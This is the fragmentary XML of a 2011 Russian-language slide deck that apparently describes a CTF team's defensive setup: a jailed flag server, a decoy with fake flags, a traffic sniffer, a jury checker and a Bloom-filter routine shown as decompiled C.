              <a:gd name="connsiteX65" fmla="*/ 1221854 w 1369026"/>
              <a:gd name="connsiteY65" fmla="*/ 3022600 h 3141134"/>
              <a:gd name="connsiteX66" fmla="*/ 1247254 w 1369026"/>
              <a:gd name="connsiteY66" fmla="*/ 3031067 h 3141134"/>
              <a:gd name="connsiteX67" fmla="*/ 1264187 w 1369026"/>
              <a:gd name="connsiteY67" fmla="*/ 3031067 h 314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69026" h="3141134">
                <a:moveTo>
                  <a:pt x="917054" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="933987" y="5645"/>
                  <a:pt x="953575" y="6224"/>
                  <a:pt x="967854" y="16934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="998127" y="39639"/>
                  <a:pt x="974185" y="52363"/>
                  <a:pt x="993254" y="76200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="999611" y="84146"/>
                  <a:pt x="1010187" y="87489"/>
                  <a:pt x="1018654" y="93134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1024298" y="101601"/>
                  <a:pt x="1031036" y="109433"/>
                  <a:pt x="1035587" y="118534"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1039578" y="126516"/>
                  <a:pt x="1044054" y="135009"/>
                  <a:pt x="1044054" y="143934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1044054" y="346556"/>
                  <a:pt x="1057738" y="297616"/>
                  <a:pt x="1027120" y="389467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1024298" y="406400"/>
                  <a:pt x="1021264" y="423300"/>
                  <a:pt x="1018654" y="440267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1015620" y="459991"/>
                  <a:pt x="1014101" y="479965"/>
                  <a:pt x="1010187" y="499534"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1008437" y="508285"/>
                  <a:pt x="1004542" y="516467"/>
                  <a:pt x="1001720" y="524934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="988445" y="604587"/>
                  <a:pt x="1000420" y="549025"/>
                  <a:pt x="984787" y="601134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="978883" y="620813"/>
                  <a:pt x="976199" y="641625"/>
                  <a:pt x="967854" y="660400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="964612" y="667695"/>
                  <a:pt x="955348" y="670692"/>
                  <a:pt x="950920" y="677334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="943919" y="687835"/>
                  <a:pt x="938959" y="699599"/>
                  <a:pt x="933987" y="711200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="930471" y="719403"/>
                  <a:pt x="931095" y="729631"/>
                  <a:pt x="925520" y="736600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="880058" y="793428"/>
                  <a:pt x="880975" y="788507"/>
                  <a:pt x="832387" y="812800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="786531" y="858656"/>
                  <a:pt x="830723" y="824306"/>
                  <a:pt x="756187" y="846667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744098" y="850294"/>
                  <a:pt x="734138" y="859168"/>
                  <a:pt x="722320" y="863600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="711425" y="867686"/>
                  <a:pt x="699258" y="867745"/>
                  <a:pt x="688454" y="872067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="640171" y="891380"/>
                  <a:pt x="646970" y="888152"/>
                  <a:pt x="620720" y="914400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="612652" y="938606"/>
                  <a:pt x="609102" y="947093"/>
                  <a:pt x="603787" y="973667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="600420" y="990501"/>
                  <a:pt x="600749" y="1008181"/>
                  <a:pt x="595320" y="1024467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="592102" y="1034120"/>
                  <a:pt x="584031" y="1041400"/>
                  <a:pt x="578387" y="1049867"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="557677" y="1153413"/>
                  <a:pt x="580978" y="1046012"/>
                  <a:pt x="561454" y="1117600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="554945" y="1141466"/>
                  <a:pt x="540563" y="1210181"/>
                  <a:pt x="527587" y="1236134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="521943" y="1247423"/>
                  <a:pt x="515626" y="1258399"/>
                  <a:pt x="510654" y="1270000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="507138" y="1278203"/>
                  <a:pt x="506779" y="1287747"/>
                  <a:pt x="502187" y="1295400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="498080" y="1302245"/>
                  <a:pt x="489682" y="1305692"/>
                  <a:pt x="485254" y="1312334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="478253" y="1322835"/>
                  <a:pt x="474680" y="1335298"/>
                  <a:pt x="468320" y="1346200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="454904" y="1369198"/>
                  <a:pt x="440281" y="1391471"/>
                  <a:pt x="425987" y="1413934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="420524" y="1422519"/>
                  <a:pt x="413605" y="1430233"/>
                  <a:pt x="409054" y="1439334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="403409" y="1450623"/>
                  <a:pt x="397092" y="1461599"/>
                  <a:pt x="392120" y="1473200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="388604" y="1481403"/>
                  <a:pt x="388082" y="1490851"/>
                  <a:pt x="383654" y="1498600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="370235" y="1522083"/>
                  <a:pt x="358745" y="1531976"/>
                  <a:pt x="341320" y="1549400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="335676" y="1566333"/>
                  <a:pt x="328716" y="1582884"/>
                  <a:pt x="324387" y="1600200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="321565" y="1611489"/>
                  <a:pt x="320006" y="1623171"/>
                  <a:pt x="315920" y="1634067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="311488" y="1645885"/>
                  <a:pt x="304631" y="1656645"/>
                  <a:pt x="298987" y="1667934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297482" y="1675461"/>
                  <a:pt x="286535" y="1733678"/>
                  <a:pt x="282054" y="1744134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254181" y="1809171"/>
                  <a:pt x="274555" y="1724295"/>
                  <a:pt x="248187" y="1803400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240828" y="1825479"/>
                  <a:pt x="237648" y="1848757"/>
                  <a:pt x="231254" y="1871134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214321" y="1930401"/>
                  <a:pt x="192543" y="1988493"/>
                  <a:pt x="180454" y="2048934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="174809" y="2077156"/>
                  <a:pt x="176391" y="2107857"/>
                  <a:pt x="163520" y="2133600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121826" y="2216991"/>
                  <a:pt x="172906" y="2112483"/>
                  <a:pt x="129654" y="2209800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124528" y="2221334"/>
                  <a:pt x="117692" y="2232066"/>
                  <a:pt x="112720" y="2243667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109204" y="2251870"/>
                  <a:pt x="107388" y="2260711"/>
                  <a:pt x="104254" y="2269067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73882" y="2350058"/>
                  <a:pt x="98070" y="2279147"/>
                  <a:pt x="78854" y="2336800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76032" y="2365022"/>
                  <a:pt x="74219" y="2393364"/>
                  <a:pt x="70387" y="2421467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65748" y="2455486"/>
                  <a:pt x="61781" y="2489758"/>
                  <a:pt x="53454" y="2523067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50632" y="2534356"/>
                  <a:pt x="46900" y="2545456"/>
                  <a:pt x="44987" y="2556934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41246" y="2579378"/>
                  <a:pt x="39178" y="2602069"/>
                  <a:pt x="36520" y="2624667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34600" y="2640986"/>
                  <a:pt x="23159" y="2748955"/>
                  <a:pt x="19587" y="2768600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17990" y="2777381"/>
                  <a:pt x="13942" y="2785533"/>
                  <a:pt x="11120" y="2794000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4764" y="2870274"/>
                  <a:pt x="-10357" y="2997435"/>
                  <a:pt x="11120" y="3064934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14040" y="3074111"/>
                  <a:pt x="94027" y="3088289"/>
                  <a:pt x="104254" y="3090334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150587" y="3121222"/>
                  <a:pt x="111091" y="3100168"/>
                  <a:pt x="188920" y="3115734"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="197671" y="3117484"/>
                  <a:pt x="205517" y="3122733"/>
                  <a:pt x="214320" y="3124200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="239529" y="3128401"/>
                  <a:pt x="265161" y="3129497"/>
                  <a:pt x="290520" y="3132667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310322" y="3135142"/>
                  <a:pt x="330031" y="3138312"/>
                  <a:pt x="349787" y="3141134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="459854" y="3138312"/>
                  <a:pt x="570118" y="3139832"/>
                  <a:pt x="679987" y="3132667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="700490" y="3131330"/>
                  <a:pt x="718732" y="3116727"/>
                  <a:pt x="739254" y="3115734"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="894320" y="3108231"/>
                  <a:pt x="1049698" y="3110089"/>
                  <a:pt x="1204920" y="3107267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219031" y="3104445"/>
                  <a:pt x="1232942" y="3100306"/>
                  <a:pt x="1247254" y="3098800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1286648" y="3094653"/>
                  <a:pt x="1328697" y="3104243"/>
                  <a:pt x="1365787" y="3090334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1382500" y="3084067"/>
                  <a:pt x="1329839" y="3083301"/>
                  <a:pt x="1314987" y="3073400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1306520" y="3067756"/>
                  <a:pt x="1297867" y="3062381"/>
                  <a:pt x="1289587" y="3056467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1264438" y="3038504"/>
                  <a:pt x="1254544" y="3022600"/>
                  <a:pt x="1221854" y="3022600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1212929" y="3022600"/>
                  <a:pt x="1238503" y="3029317"/>
                  <a:pt x="1247254" y="3031067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1252789" y="3032174"/>
                  <a:pt x="1258543" y="3031067"/>
                  <a:pt x="1264187" y="3031067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868144" y="591071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Боевой сервер с обновляемыми через</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>флагами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378904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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>с работающими </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>сервисами, но </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>фейковыми</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> флагами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42" y="2497435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Сниффер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>! Ищем в исходящем трафике </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>фейковые</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> флаги</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="6-Point Star 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324290" y="2774962"/>
            <a:ext cx="318955" cy="36827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23528" y="116632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Защита</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty="0"/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510723" y="2060848"/>
            <a:ext cx="3066295" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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5398" y="167542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Jury checker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Hiver</a:t>
            </a:r>
            <a:endParaRPr lang="ru-R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96752"/>
            <a:ext cx="3190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119675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Bloom filter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429000"/>
            <a:ext cx="8568951" cy="253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вероятностная структура данных, придуманная </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Бёртоном</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Блумом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> в 1970 году[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>позволяющая </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>компактно хранить множество элементов и проверять принадлежность заданного элемента к множеству. При этом существует возможность получить ложноположительное срабатывание (элемента в множестве нет, но структура данных сообщает, что он есть), но не ложноотрицательное.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3447738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Hiver</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="980728"/>
            <a:ext cx="8478688" cy="56138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__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cdecl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bloom_check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(BLOOM *bloom, char *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input_data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{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size_t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n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; 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//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ebx@2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unsigned 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 hash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; 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//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eax@3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unsigned __int8 *v4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; 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//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ebx@6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int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result_; //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[sp+8h] [bp-10h]@1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 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ru-RU" sz="1200" dirty="0" err="1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result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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0;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if (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nfuncs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{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n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0;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do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{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 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hash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funcs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[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n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](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1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input_data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  if ( ((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signed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1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int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-&gt;key[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hash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%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key_size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&gt;&gt; 3] &gt;&gt; ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unsigned __int8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hash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% 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 marL="44958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LOBYTE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key_size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 &amp; 7)) &amp; 1 )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result_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+= 1 &lt;&lt;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n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  ++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n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}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  while (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nfuncs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&gt;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n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}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v4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= &amp;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-&gt;key[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0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rand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() %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key_size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&gt;&gt; 3];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*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v4 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^= 1 &lt;&lt; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rand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() % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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bloom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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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key_size</a:t>
            </a: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&amp; 7);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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1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result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8080FF"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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80"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}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079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411</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>129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Classic Photo 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2011-09-22T07:05:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-09-22T10:11:47Z</dcterms:modified>
</cp:coreProperties>
</file>